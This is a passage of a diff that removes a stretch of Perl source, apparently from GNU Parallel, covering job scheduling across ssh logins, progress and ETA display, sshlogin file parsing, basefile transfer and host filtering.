-	    if($Global::JobQueue->empty() and not $opt::pipe) {
-		# No more jobs in the queue
-		last;
-	    }
-	    debug("run", "Running jobs before on ", $sshlogin->string(), ": ",
-		  $sshlogin->jobs_running(), "\n");
-	    if ($sshlogin->jobs_running() < $sshlogin->max_jobs_running()) {
-		if($opt::load and $sshlogin->loadavg_too_high()) {
-		    # The load is too high or unknown
-		    next;
-		}
-		if($opt::noswap and $sshlogin->swapping()) {
-		    # The server is swapping
-		    next;
-		}
-		if($sshlogin->too_fast_remote_login()) {
-		    # It has been too short since
-		    next;
-		}
-		if($opt::delay and $opt::delay > ::now() - $Global::newest_starttime) {
-		    # It has been too short since last start
-		    next;
-		}
-		debug("run", $sshlogin->string(), " has ", $sshlogin->jobs_running(),
-		      " out of ", $sshlogin->max_jobs_running(),
-		      " jobs running. Start another.\n");
-		if(start_another_job($sshlogin) == 0) {
-		    # No more jobs to start on this $sshlogin
-		    debug("run","No jobs started on ", $sshlogin->string(), "\n");
-		    next;
-		}
-		$sshlogin->inc_jobs_running();
-		$sshlogin->set_last_login_at(::now());
-		$jobs_started++;
-		$jobs_started_this_round++;
-	    }
-	    debug("run","Running jobs after on ", $sshlogin->string(), ": ",
-		  $sshlogin->jobs_running(), " of ",
-		  $sshlogin->max_jobs_running(), "\n");
-	}
-    } while($jobs_started_this_round);
-
-    return $jobs_started;
-}
-}
-
-{
-    my $no_more_file_handles_warned;
-
-sub start_another_job {
-    # If there are enough filehandles
-    #   and JobQueue not empty
-    #   and not $job is in joblog
-    # Then grab a job from Global::JobQueue,
-    #   start it at sshlogin
-    #   mark it as virgin_job
-    # Inputs:
-    #   $sshlogin = the SSHLogin to start the job on
-    # Uses:
-    #   $Global::JobQueue
-    #   $opt::pipe
-    #   $opt::results
-    #   $opt::resume
-    #   @Global::virgin_jobs
-    # Returns:
-    #   1 if another jobs was started
-    #   0 otherwise
-    my $sshlogin = shift;
-    # Do we have enough file handles to start another job?
-    if(enough_file_handles()) {
-        if($Global::JobQueue->empty() and not $opt::pipe) {
-            # No more commands to run
-	    debug("start", "Not starting: JobQueue empty\n");
-	    return 0;
-        } else {
-            my $job;
-	    # Skip jobs already in job log
-	    # Skip jobs already in results
-            do {
-		$job = get_job_with_sshlogin($sshlogin);
-		if(not defined $job) {
-		    # No command available for that sshlogin
-		    debug("start", "Not starting: no jobs available for ",
-			  $sshlogin->string(), "\n");
-		    return 0;
-		}
-	    } while ($job->is_already_in_joblog()
-		     or
-		     ($opt::results and $opt::resume and $job->is_already_in_results()));
-	    debug("start", "Command to run on '", $job->sshlogin()->string(), "': '",
-		  $job->replaced(),"'\n");
-            if($job->start()) {
-		if($opt::pipe) {
-		    push(@Global::virgin_jobs,$job);
-		}
-                debug("start", "Started as seq ", $job->seq(),
-		      " pid:", $job->pid(), "\n");
-                return 1;
-            } else {
-                # Not enough processes to run the job.
-		# Put it back on the queue.
-		$Global::JobQueue->unget($job);
-		# Count down the number of jobs to run for this SSHLogin.
-		my $max = $sshlogin->max_jobs_running();
-		if($max > 1) { $max--; } else {
-		    ::error("No more processes: cannot run a single job. Something is wrong.\n");
-		    ::wait_and_exit(255);
-		}
-		$sshlogin->set_max_jobs_running($max);
-		# Sleep up to 300 ms to give other processes time to die
-		::usleep(rand()*300);
-		::warning("No more processes: ",
-			  "Decreasing number of running jobs to $max. ",
-			  "Raising ulimit -u or /etc/security/limits.conf may help.\n");
-		return 0;
-            }
-        }
-    } else {
-        # No more file handles
-	$no_more_file_handles_warned++ or
-	    ::warning("No more file handles. ",
-		      "Raising ulimit -n or /etc/security/limits.conf may help.\n");
-        return 0;
-    }
-}
-}
-
-sub init_progress {
-    # Uses:
-    #   $opt::bar
-    # Returns:
-    #   list of computers for progress output
-    $|=1;
-    if($opt::bar) {
-	return("","");
-    }
-    my %progress = progress();
-    return ("\nComputers / CPU cores / Max jobs to run\n",
-            $progress{'workerlist'});
-}
-
-sub drain_job_queue {
-    # Uses:
-    #   $opt::progress
-    #   $Global::original_stderr
-    #   $Global::total_running
-    #   $Global::max_jobs_running
-    #   %Global::running
-    #   $Global::JobQueue
-    #   %Global::host
-    #   $Global::start_no_new_jobs
-    # Returns: N/A
-    if($opt::progress) {
-        print $Global::original_stderr init_progress();
-    }
-    my $last_header="";
-    my $sleep = 0.2;
-    do {
-        while($Global::total_running > 0) {
-            debug($Global::total_running, "==", scalar
-		  keys %Global::running," slots: ", $Global::max_jobs_running);
-	    if($opt::pipe) {
-		# When using --pipe sometimes file handles are not closed properly
-		for my $job (values %Global::running) {
-		    close $job->fh(0,"w");
-		}
-	    }
-            if($opt::progress) {
-                my %progress = progress();
-                if($last_header ne $progress{'header'}) {
-                    print $Global::original_stderr "\n", $progress{'header'}, "\n";
-                    $last_header = $progress{'header'};
-                }
-                print $Global::original_stderr "\r",$progress{'status'};
-		flush $Global::original_stderr;
-            }
-	    if($Global::total_running < $Global::max_jobs_running
-	       and not $Global::JobQueue->empty()) {
-		# These jobs may not be started because of loadavg
-		# or too little time between each ssh login.
-		if(start_more_jobs() > 0) {
-		    # Exponential back-on if jobs were started
-		    $sleep = $sleep/2+0.001;
-		}
-	    }
-            # Sometimes SIGCHLD is not registered, so force reaper
-	    $sleep = ::reap_usleep($sleep);
-        }
-        if(not $Global::JobQueue->empty()) {
-	    # These jobs may not be started:
-	    # * because there the --filter-hosts has removed all
-	    if(not %Global::host) {
-		::error("There are no hosts left to run on.\n");
-		::wait_and_exit(255);
-	    }
-	    # * because of loadavg
-	    # * because of too little time between each ssh login.
-            start_more_jobs();
-	    $sleep = ::reap_usleep($sleep);
-	    if($Global::max_jobs_running == 0) {
-		::warning("There are no job slots available. Increase --jobs.\n");
-	    }
-        }
-    } while ($Global::total_running > 0
-	     or
-	     not $Global::start_no_new_jobs and not $Global::JobQueue->empty());
-    if($opt::progress) {
-	my %progress = progress();
-	print $Global::original_stderr "\r", $progress{'status'}, "\n";
-	flush $Global::original_stderr;
-    }
-}
-
-sub toggle_progress {
-    # Turn on/off progress view
-    # Uses:
-    #   $opt::progress
-    #   $Global::original_stderr
-    # Returns: N/A
-    $opt::progress = not $opt::progress;
-    if($opt::progress) {
-        print $Global::original_stderr init_progress();
-    }
-}
-
-sub progress {
-    # Uses:
-    #   $opt::bar
-    #   $opt::eta
-    #   %Global::host
-    #   $Global::total_started
-    # Returns:
-    #   $workerlist = list of workers
-    #   $header = that will fit on the screen
-    #   $status = message that will fit on the screen
-    if($opt::bar) {
-	return ("workerlist" => "", "header" => "", "status" => bar());
-    }
-    my $eta = "";
-    my ($status,$header)=("","");
-    if($opt::eta) {
-	my($total, $completed, $left, $pctcomplete, $avgtime, $this_eta) =
-	    compute_eta();
-	$eta = sprintf("ETA: %ds Left: %d AVG: %.2fs  ",
-		       $this_eta, $left, $avgtime);
-    }
-    my $termcols = terminal_columns();
-    my @workers = sort keys %Global::host;
-    my %sshlogin = map { $_ eq ":" ? ($_=>"local") : ($_=>$_) } @workers;
-    my $workerno = 1;
-    my %workerno = map { ($_=>$workerno++) } @workers;
-    my $workerlist = "";
-    for my $w (@workers) {
-        $workerlist .=
-        $workerno{$w}.":".$sshlogin{$w} ." / ".
-            ($Global::host{$w}->ncpus() || "-")." / ".
-            $Global::host{$w}->max_jobs_running()."\n";
-    }
-    $status = "x"x($termcols+1);
-    if(length $status > $termcols) {
-        # sshlogin1:XX/XX/XX%/XX.Xs sshlogin2:XX/XX/XX%/XX.Xs sshlogin3:XX/XX/XX%/XX.Xs
-        $header = "Computer:jobs running/jobs completed/%of started jobs/Average seconds to complete";
-        $status = $eta .
-            join(" ",map
-                 {
-                     if($Global::total_started) {
-                         my $completed = ($Global::host{$_}->jobs_completed()||0);
-                         my $running = $Global::host{$_}->jobs_running();
-                         my $time = $completed ? (time-$^T)/($completed) : "0";
-                         sprintf("%s:%d/%d/%d%%/%.1fs ",
-                                 $sshlogin{$_}, $running, $completed,
-                                 ($running+$completed)*100
-                                 / $Global::total_started, $time);
-                     }
-                 } @workers);
-    }
-    if(length $status > $termcols) {
-        # 1:XX/XX/XX%/XX.Xs 2:XX/XX/XX%/XX.Xs 3:XX/XX/XX%/XX.Xs 4:XX/XX/XX%/XX.Xs
-        $header = "Computer:jobs running/jobs completed/%of started jobs";
-        $status = $eta .
-            join(" ",map
-                 {
-                     my $completed = ($Global::host{$_}->jobs_completed()||0);
-                     my $running = $Global::host{$_}->jobs_running();
-                     my $time = $completed ? (time-$^T)/($completed) : "0";
-                     sprintf("%s:%d/%d/%d%%/%.1fs ",
-                             $workerno{$_}, $running, $completed,
-                             ($running+$completed)*100
-                             / $Global::total_started, $time);
-                 } @workers);
-    }
-    if(length $status > $termcols) {
-        # sshlogin1:XX/XX/XX% sshlogin2:XX/XX/XX% sshlogin3:XX/XX/XX%
-        $header = "Computer:jobs running/jobs completed/%of started jobs";
-        $status = $eta .
-            join(" ",map
-                 { sprintf("%s:%d/%d/%d%%",
-                           $sshlogin{$_},
-                           $Global::host{$_}->jobs_running(),
-                           ($Global::host{$_}->jobs_completed()||0),
-                           ($Global::host{$_}->jobs_running()+
-                            ($Global::host{$_}->jobs_completed()||0))*100
-                           / $Global::total_started) }
-                 @workers);
-    }
-    if(length $status > $termcols) {
-        # 1:XX/XX/XX% 2:XX/XX/XX% 3:XX/XX/XX% 4:XX/XX/XX% 5:XX/XX/XX% 6:XX/XX/XX%
-        $header = "Computer:jobs running/jobs completed/%of started jobs";
-        $status = $eta .
-            join(" ",map
-                 { sprintf("%s:%d/%d/%d%%",
-                           $workerno{$_},
-                           $Global::host{$_}->jobs_running(),
-                           ($Global::host{$_}->jobs_completed()||0),
-                           ($Global::host{$_}->jobs_running()+
-                            ($Global::host{$_}->jobs_completed()||0))*100
-                           / $Global::total_started) }
-                 @workers);
-    }
-    if(length $status > $termcols) {
-        # sshlogin1:XX/XX/XX% sshlogin2:XX/XX/XX% sshlogin3:XX/XX sshlogin4:XX/XX
-        $header = "Computer:jobs running/jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d/%d",
-                                 $sshlogin{$_}, $Global::host{$_}->jobs_running(),
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    if(length $status > $termcols) {
-        # sshlogin1:XX/XX sshlogin2:XX/XX sshlogin3:XX/XX sshlogin4:XX/XX
-        $header = "Computer:jobs running/jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d/%d",
-                                 $sshlogin{$_}, $Global::host{$_}->jobs_running(),
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    if(length $status > $termcols) {
-        # 1:XX/XX 2:XX/XX 3:XX/XX 4:XX/XX 5:XX/XX 6:XX/XX
-        $header = "Computer:jobs running/jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d/%d",
-                                 $workerno{$_}, $Global::host{$_}->jobs_running(),
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    if(length $status > $termcols) {
-        # sshlogin1:XX sshlogin2:XX sshlogin3:XX sshlogin4:XX sshlogin5:XX
-        $header = "Computer:jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d",
-                                 $sshlogin{$_},
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    if(length $status > $termcols) {
-        # 1:XX 2:XX 3:XX 4:XX 5:XX 6:XX
-        $header = "Computer:jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d",
-                                 $workerno{$_},
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    return ("workerlist" => $workerlist, "header" => $header, "status" => $status);
-}
-
-{
-    my ($total, $first_completed, $smoothed_avg_time);
-
-    sub compute_eta {
-	# Calculate important numbers for ETA
-	# Returns:
-	#   $total = number of jobs in total
-	#   $completed = number of jobs completed
-	#   $left = number of jobs left
-	#   $pctcomplete = percent of jobs completed
-	#   $avgtime = averaged time
-	#   $eta = smoothed eta
-	$total ||= $Global::JobQueue->total_jobs();
-	my $completed = 0;
-        for(values %Global::host) { $completed += $_->jobs_completed() }
-	my $left = $total - $completed;
-	if(not $completed) {
-	    return($total, $completed, $left, 0, 0, 0);
-	}
-	my $pctcomplete = $completed / $total;
-	$first_completed ||= time;
-	my $timepassed = (time - $first_completed);
-	my $avgtime = $timepassed / $completed;
-	$smoothed_avg_time ||= $avgtime;
-	# Smooth the eta so it does not jump wildly
-	$smoothed_avg_time = (1 - $pctcomplete) * $smoothed_avg_time +
-	    $pctcomplete * $avgtime;
-	my $eta = int($left * $smoothed_avg_time);
-	return($total, $completed, $left, $pctcomplete, $avgtime, $eta);
-    }
-}
-
-{
-    my ($rev,$reset);
-
-    sub bar {
-	# Return:
-	#   $status = bar with eta, completed jobs, arg and pct
-	$rev ||= "\033[7m";
-	$reset ||= "\033[0m";
-	my($total, $completed, $left, $pctcomplete, $avgtime, $eta) =
-	    compute_eta();
-	my $arg = $Global::newest_job ?
-	    $Global::newest_job->{'commandline'}->replace_placeholders(["\257<\257>"],0,0) : "";
-	# These chars mess up display in the terminal
-	$arg =~ tr/[\011-\016\033\302-\365]//d;
-	my $bar_text =
-	    sprintf("%d%% %d:%d=%ds %s",
-		    $pctcomplete*100, $completed, $left, $eta, $arg);
-	my $terminal_width = terminal_columns();
-	my $s = sprintf("%-${terminal_width}s",
-			substr($bar_text." "x$terminal_width,
-			       0,$terminal_width));
-	my $width = int($terminal_width * $pctcomplete);
-	substr($s,$width,0) = $reset;
-	my $zenity = sprintf("%-${terminal_width}s",
-			     substr("#   $eta sec $arg",
-				    0,$terminal_width));
-	$s = "\r" . $zenity . "\r" . $pctcomplete*100 . # Prefix with zenity header
-	    "\r" . $rev . $s . $reset;
-	return $s;
-    }
-}
-
-{
-    my ($columns,$last_column_time);
-
-    sub terminal_columns {
-	# Get the number of columns of the display
-	# Returns:
-	#   number of columns of the screen
-	if(not $columns or $last_column_time < time) {
-	    $last_column_time = time;
-	    $columns = $ENV{'COLUMNS'};
-	    if(not $columns) {
-		my $resize = qx{ resize 2>/dev/null };
-		$resize =~ /COLUMNS=(\d+);/ and do { $columns = $1; };
-	    }
-	    $columns ||= 80;
-	}
-	return $columns;
-    }
-}
-
-sub get_job_with_sshlogin {
-    # Returns:
-    #   next job object for $sshlogin if any available
-    my $sshlogin = shift;
-    my $job = undef;
-
-    if ($opt::hostgroups) {
-	my @other_hostgroup_jobs = ();
-
-        while($job = $Global::JobQueue->get()) {
-	    if($sshlogin->in_hostgroups($job->hostgroups())) {
-		# Found a job for this hostgroup
-		last;
-	    } else {
-		# This job was not in the hostgroups of $sshlogin
-                push @other_hostgroup_jobs, $job;
-            }
-        }
-	$Global::JobQueue->unget(@other_hostgroup_jobs);
-	if(not defined $job) {
-	    # No more jobs
-	    return undef;
-	}
-    } else {
-        $job = $Global::JobQueue->get();
-        if(not defined $job) {
-            # No more jobs
-	    ::debug("start", "No more jobs: JobQueue empty\n");
-            return undef;
-        }
-    }
-
-    my $clean_command = $job->replaced();
-    if($clean_command =~ /^\s*$/) {
-        # Do not run empty lines
-        if(not $Global::JobQueue->empty()) {
-            return get_job_with_sshlogin($sshlogin);
-        } else {
-            return undef;
-        }
-    }
-    $job->set_sshlogin($sshlogin);
-    if($opt::retries and $clean_command and
-       $job->failed_here()) {
-        # This command with these args failed for this sshlogin
-        my ($no_of_failed_sshlogins,$min_failures) = $job->min_failed();
-	# Only look at the Global::host that have > 0 jobslots
-        if($no_of_failed_sshlogins == grep { $_->max_jobs_running() > 0 } values %Global::host
-	   and $job->failed_here() == $min_failures) {
-            # It failed the same or more times on another host:
-            # run it on this host
-        } else {
-            # If it failed fewer times on another host:
-            # Find another job to run
-            my $nextjob;
-            if(not $Global::JobQueue->empty()) {
-		# This can potentially recurse for all args
-                no warnings 'recursion';
-                $nextjob = get_job_with_sshlogin($sshlogin);
-            }
-            # Push the command back on the queue
-            $Global::JobQueue->unget($job);
-            return $nextjob;
-        }
-    }
-    return $job;
-}
-
-sub __REMOTE_SSH__ {}
-
-sub read_sshloginfiles {
-    # Returns: N/A
-    for my $s (@_) {
-	read_sshloginfile(expand_slf_shorthand($s));
-    }
-}
-
-sub expand_slf_shorthand {
-    my $file = shift;
-    if($file eq "-") {
-	# skip: It is stdin
-    } elsif($file eq "..") {
-        $file = $ENV{'HOME'}."/.parallel/sshloginfile";
-    } elsif($file eq ".") {
-        $file = "/etc/parallel/sshloginfile";
-    } elsif(not -r $file) {
-	if(not -r $ENV{'HOME'}."/.parallel/".$file) {
-		# Try prepending ~/.parallel
-		::error("Cannot open $file.\n");
-		::wait_and_exit(255);
-	} else {
-	    $file = $ENV{'HOME'}."/.parallel/".$file;
-	}
-    }
-    return $file;
-}
-
-sub read_sshloginfile {
-    # Returns: N/A
-    my $file = shift;
-    my $close = 1;
-    my $in_fh;
-    ::debug("init","--slf ",$file);
-    if($file eq "-") {
-	$in_fh = *STDIN;
-	$close = 0;
-    } else {
-	if(not open($in_fh, "<", $file)) {
-	    # Try the filename
-	    ::error("Cannot open $file.\n");
-	    ::wait_and_exit(255);
-	}
-    }
-    while(<$in_fh>) {
-        chomp;
-        /^\s*#/ and next;
-        /^\s*$/ and next;
-        push @Global::sshlogin, $_;
-    }
-    if($close) {
-	close $in_fh;
-    }
-}
-
-sub parse_sshlogin {
-    # Returns: N/A
-    my @login;
-    if(not @Global::sshlogin) { @Global::sshlogin = (":"); }
-    for my $sshlogin (@Global::sshlogin) {
-        # Split up -S sshlogin,sshlogin
-        for my $s (split /,/, $sshlogin) {
-            if ($s eq ".." or $s eq "-") {
-		# This may add to @Global::sshlogin - possibly bug
-		read_sshloginfile(expand_slf_shorthand($s));
-            } else {
-                push (@login, $s);
-            }
-        }
-    }
-    $Global::minimal_command_line_length = 8_000_000;
-    my @allowed_hostgroups;
-    for my $ncpu_sshlogin_string (::uniq(@login)) {
-	my $sshlogin = SSHLogin->new($ncpu_sshlogin_string);
-	my $sshlogin_string = $sshlogin->string();
-	if($sshlogin_string eq "") {
-	    # This is an ssh group: -S @webservers
-	    push @allowed_hostgroups, $sshlogin->hostgroups();
-	    next;
-	}
-	if($Global::host{$sshlogin_string}) {
-	    # This sshlogin has already been added:
-	    # It is probably a host that has come back
-	    # Set the max_jobs_running back to the original
-	    debug("run","Already seen $sshlogin_string\n");
-	    if($sshlogin->{'ncpus'}) {
-		# If ncpus set by '#/' of the sshlogin, overwrite it:
-		$Global::host{$sshlogin_string}->set_ncpus($sshlogin->ncpus());
-	    }
-	    $Global::host{$sshlogin_string}->set_max_jobs_running(undef);
-	    next;
-	}
-	if($sshlogin_string eq ":") {
-	    $sshlogin->set_maxlength(Limits::Command::max_length());
-	} else {
-	    # If all chars needs to be quoted, every other character will be \
-	    $sshlogin->set_maxlength(int(Limits::Command::max_length()/2));
-	}
-	$Global::minimal_command_line_length =
-	    ::min($Global::minimal_command_line_length, $sshlogin->maxlength());
-        $Global::host{$sshlogin_string} = $sshlogin;
-    }
-    if(@allowed_hostgroups) {
-	# Remove hosts that are not in these groups
-	while (my ($string, $sshlogin) = each %Global::host) {
-	    if(not $sshlogin->in_hostgroups(@allowed_hostgroups)) {
-		delete $Global::host{$string};
-	    }
-	}
-    }
-
-    # debug("start", "sshlogin: ", my_dump(%Global::host),"\n");
-    if($opt::transfer or @opt::return or $opt::cleanup or @opt::basefile) {
-        if(not remote_hosts()) {
-            # There are no remote hosts
-            if(@opt::trc) {
-		::warning("--trc ignored as there are no remote --sshlogin.\n");
-            } elsif (defined $opt::transfer) {
-		::warning("--transfer ignored as there are no remote --sshlogin.\n");
-            } elsif (@opt::return) {
-                ::warning("--return ignored as there are no remote --sshlogin.\n");
-            } elsif (defined $opt::cleanup) {
-		::warning("--cleanup ignored as there are no remote --sshlogin.\n");
-            } elsif (@opt::basefile) {
-                ::warning("--basefile ignored as there are no remote --sshlogin.\n");
-            }
-        }
-    }
-}
-
-sub remote_hosts {
-    # Return sshlogins that are not ':'
-    # Returns:
-    #   list of sshlogins with ':' removed
-    return grep !/^:$/, keys %Global::host;
-}
-
-sub setup_basefile {
-    # Transfer basefiles to each $sshlogin
-    # This needs to be done before first jobs on $sshlogin is run
-    # Returns: N/A
-    my $cmd = "";
-    my $rsync_destdir;
-    my $workdir;
-    for my $sshlogin (values %Global::host) {
-      if($sshlogin->string() eq ":") { next }
-      for my $file (@opt::basefile) {
-	if($file !~ m:^/: and $opt::workdir eq "...") {
-	  ::error("Work dir '...' will not work with relative basefiles\n");
-	  ::wait_and_exit(255);
-	}
-	$workdir ||= Job->new("")->workdir();
-	$cmd .= $sshlogin->rsync_transfer_cmd($file,$workdir) . "&";
-      }
-    }
-    $cmd .= "wait;";
-    debug("init", "basesetup: $cmd\n");
-    print `$cmd`;
-}
-
-sub cleanup_basefile {
-    # Remove the basefiles transferred
-    # Returns: N/A
-    my $cmd="";
-    my $workdir = Job->new("")->workdir();
-    for my $sshlogin (values %Global::host) {
-        if($sshlogin->string() eq ":") { next }
-        for my $file (@opt::basefile) {
-	  $cmd .= $sshlogin->cleanup_cmd($file,$workdir)."&";
-        }
-    }
-    $cmd .= "wait;";
-    debug("init", "basecleanup: $cmd\n");
-    print `$cmd`;
-}
-
-sub filter_hosts {
-    my(@cores, @cpus, @maxline, @echo);
-    my $envvar = ::shell_quote_scalar($Global::envvar);
-    while (my ($host, $sshlogin) = each %Global::host) {
-	if($host eq ":") { next }
-	# The 'true' is used to get the $host out later
-	my $sshcmd = "true $host;" . $sshlogin->sshcommand()." ".$sshlogin->serverlogin();
-	push(@cores, $host."\t".$sshcmd." ".$envvar." parallel --number-of-cores\n\0");
-	push(@cpus, $host."\t".$sshcmd." ".$envvar." parallel --number-of-cpus\n\0");
-	push(@maxline, $host."\t".$sshcmd." ".$envvar." parallel --max-line-length-allowed\n\0");
-	# 'echo' is used to get the best possible value for an ssh login time
-	push(@echo, $host."\t".$sshcmd." echo\n\0");
-    }
-    my ($fh, $tmpfile) = ::tmpfile(SUFFIX => ".ssh");
-    print $fh @cores, @cpus, @maxline, @echo;
-    close $fh;
-    # --timeout 5: Setting up an SSH connection and running a simple
-    #              command should never take > 5 sec.
-    # --delay 0.1: If multiple sshlogins use the same proxy the delay
-    #              will make it less likely to overload the ssh daemon.
-    # --retries 3: If the ssh daemon it overloaded, try 3 times
-    # -s 16000: Half of the max line on UnixWare
-    my $cmd = "cat $tmpfile | $0 -j0 --timeout 5 -s 16000 --joblog - --plain --delay 0.1 --retries 3 --tag --tagstring {1} -0 --colsep '\t' -k eval {2} 2>/dev/null";
-    ::debug("init", $cmd, "\n");
-    open(my $host_fh, "-|", $cmd) || ::die_bug("parallel host check: $cmd");
-    my (%ncores, %ncpus, %time_to_login, %maxlen, %echo, @down_hosts);
-    my $prepend = "";
-    while(<$host_fh>) {
-	if(/\'$/) {
-	    # if last char = ' then append next line
-	    # This may be due to quoting of $Global::envvar
-	    $prepend .= $_;
-	    next;
-	}
-	$_ = $prepend . $_;
-	$prepend = "";
-	chomp;
-	my @col = split /\t/, $_;
-	if(defined $col[6]) {
-	    # This is a line from --joblog
-	    # seq host time spent sent received exit signal command
-	    # 2 : 1372607672.654 0.675 0 0 0 0 eval true\ m\;ssh\ m\ parallel\ --number-of-cores
-	    if($col[0] eq "Seq" and $col[1] eq "Host" and
-		    $col[2] eq "Starttime") {
-		# Header => skip
-		next;
-	    }
-	    # Get server from: eval true server\;
-	    $col[8] =~ /eval true..([^;]+).;/ or ::die_bug("col8 does not contain host: $col[8]");
-	    my $host = $1;
-	    $host =~ tr/\\//d;
-	    $Global::host{$host} or next;
-	    if($col[6] eq "255" or $col[7] eq "15") {
-		# exit == 255 or signal == 15: ssh failed
-		# Remove sshlogin
-		::debug("init", "--filtered $host\n");
-		push(@down_hosts, $host);
-		@down_hosts = uniq(@down_hosts);
-	    } elsif($col[6] eq "127") {
-		# signal == 127: parallel not installed remote
-		# Set ncpus and ncores = 1
-		::warning("Could not figure out ",
-			  "number of cpus on $host. Using 1.\n");
-		$ncores{$host} = 1;
-		$ncpus{$host} = 1;
-		$maxlen{$host} = Limits::Command::max_length();
-	    } elsif($col[0] =~ /^\d+$/ and $Global::host{$host}) {
-		# Remember how log it took to log in
-		# 2 : 1372607672.654 0.675 0 0 0 0 eval true\ m\;ssh\ m\ echo
-		$time_to_login{$host} = ::min($time_to_login{$host},$col[3]);
-	    } else {
-		::die_bug("host check unmatched long jobline: $_");
-	    }
-	} elsif($Global::host{$col[0]}) {
-	    # This output from --number-of-cores, --number-of-cpus,
-	    # --max-line-length-allowed
-	    # ncores: server       8
-	    # ncpus:  server       2
-	    # maxlen: server       131071
-	    if(not $ncores{$col[0]}) {
-		$ncores{$col[0]} = $col[1];
-	    } elsif(not $ncpus{$col[0]}) {
-		$ncpus{$col[0]} = $col[1];
-	    } elsif(not $maxlen{$col[0]}) {
-		$maxlen{$col[0]} = $col[1];
-	    } elsif(not $echo{$col[0]}) {
-		$echo{$col[0]} = $col[1];
-	    } elsif(m/perl: warning:|LANGUAGE =|LC_ALL =|LANG =|are supported and installed/) {
-		# Skip these:
-		# perl: warning: Setting locale failed.
-		# perl: warning: Please check that your locale settings:
-		#         LANGUAGE = (unset),
-		#         LC_ALL = (unset),
-		#         LANG = "en_US.UTF-8"
-		#     are supported and installed on your system.
-		# perl: warning: Falling back to the standard locale ("C").
-	    } else {
-		::die_bug("host check too many col0: $_");
-	    }
-	} else {
-	    ::die_bug("host check unmatched short jobline ($col[0]): $_");
-	}
-    }
-    close $host_fh;
-    $Global::debug or unlink $tmpfile;
-    delete @Global::host{@down_hosts};
-    @down_hosts and ::warning("Removed @down_hosts\n");
-    $Global::minimal_command_line_length = 8_000_000;
-    while (my ($sshlogin, $obj) = each %Global::host) {
-	if($sshlogin eq ":") { next }
-	$ncpus{$sshlogin} or ::die_bug("ncpus missing: ".$obj->serverlogin());
-	$ncores{$sshlogin} or ::die_bug("ncores missing: ".$obj->serverlogin());
-	$time_to_login{$sshlogin} or ::die_bug("time_to_login missing: ".$obj->serverlogin());
-	$maxlen{$sshlogin} or ::die_bug("maxlen missing: ".$obj->serverlogin());
-	if($opt::use_cpus_instead_of_cores) {
-	    $obj->set_ncpus($ncpus{$sshlogin});
-	} else {
-	    $obj->set_ncpus($ncores{$sshlogin});
-	}
-	$obj->set_time_to_login($time_to_login{$sshlogin});
-        $obj->set_maxlength($maxlen{$sshlogin});
-	$Global::minimal_command_line_length =
-	    ::min($Global::minimal_command_line_length,
-		  int($maxlen{$sshlogin}/2));
-	::debug("init", "Timing from -S:$sshlogin ncpus:",$ncpus{$sshlogin},
-		" ncores:", $ncores{$sshlogin},
-		" time_to_login:", $time_to_login{$sshlogin},
-		" maxlen:", $maxlen{$sshlogin},
-		" min_max_len:", $Global::minimal_command_line_length,"\n");
-    }
-}
-
-sub onall {
-    sub tmp_joblog {
-	my $joblog = shift;
-	if(not defined $joblog) {
-	    return undef;
-	}
-	my ($fh, $tmpfile) = ::tmpfile(SUFFIX => ".log");
-	close $fh;
-	return $tmpfile;
-    }
-    my @command = @_;
-    if($Global::quoting) {
-       @command = shell_quote_empty(@command);
-    }
-
-    # Copy all @fhlist into tempfiles
-    my @argfiles = ();
-    for my $fh (@fhlist) {
-	my ($outfh, $name) = ::tmpfile(SUFFIX => ".all", UNLINK => 1);
-	print $outfh (<$fh>);
-	close $outfh;
-	push @argfiles, $name;
-    }
-    if(@opt::basefile) { setup_basefile(); }
-    # for each sshlogin do:
-    # parallel -S $sshlogin $command :::: @argfiles
-    #
-    # Pass some of the options to the sub-parallels, not all of them as
-    # -P should only go to the first, and -S should not be copied at all.
-    my $options =
-	join(" ",
-	     ((defined $opt::jobs) ? "-P $opt::jobs" : ""),
-	     ((defined $opt::linebuffer) ? "--linebuffer" : ""),
-	     ((defined $opt::ungroup) ? "-u" : ""),
-	     ((defined $opt::group) ? "-g" : ""),
-	     ((defined $opt::keeporder) ? "--keeporder" : ""),
-	     ((defined $opt::D) ? "-D $opt::D" : ""),
-	     ((defined $opt::plain) ? "--plain" : ""),
-	     ((defined $opt::max_chars) ? "--max-chars ".$opt::max_chars : ""),
-	);
-    my $suboptions =
-	join(" ",
-	     ((defined $opt::ungroup) ? "-u" : ""),
-	     ((defined $opt::linebuffer) ? "--linebuffer" : ""),
-	     ((defined $opt::group) ? "-g" : ""),
-	     ((defined $opt::files) ? "--files" : ""),
-	     ((defined $opt::keeporder) ? "--keeporder" : ""),
-	     ((defined $opt::colsep) ? "--colsep ".shell_quote($opt::colsep) : ""),
-	     ((@opt::v) ? "-vv" : ""),
-	     ((defined $opt::D) ? "-D $opt::D" : ""),
-	     ((defined $opt::timeout) ? "--timeout ".$opt::timeout : ""),
-	     ((defined $opt::plain) ? "--plain" : ""),
-	     ((defined $opt::retries) ? "--retries ".$opt::retries : ""),
-	     ((defined $opt::max_chars) ? "--max-chars ".$opt::max_chars : ""),
-	     ((defined $opt::arg_sep) ? "--arg-sep ".$opt::arg_sep : ""),
-	     ((defined $opt::arg_file_sep) ? "--arg-file-sep ".$opt::arg_file_sep : ""),
-	     (@opt::env ? map { "--env ".::shell_quote_scalar($_) } @opt::env : ""),
-	);
-    ::debug("init", "| $0 $options\n");
-    open(my $parallel_fh, "|-", "$0 --no-notice -j0 $options") ||
-	::die_bug("This does not run GNU Parallel: $0 $options");
-    my @joblogs;
-    for my $host (sort keys %Global::host) {
-	my $sshlogin = $Global::host{$host};
-	my $joblog = tmp_joblog($opt::joblog);
-	if($joblog) {
-	    push @joblogs, $joblog;
-	    $joblog = "--joblog $joblog";
-	}
-	my $quad = $opt::arg_file_sep || "::::";
-	::debug("init", "$0 $suboptions -j1 $joblog ",
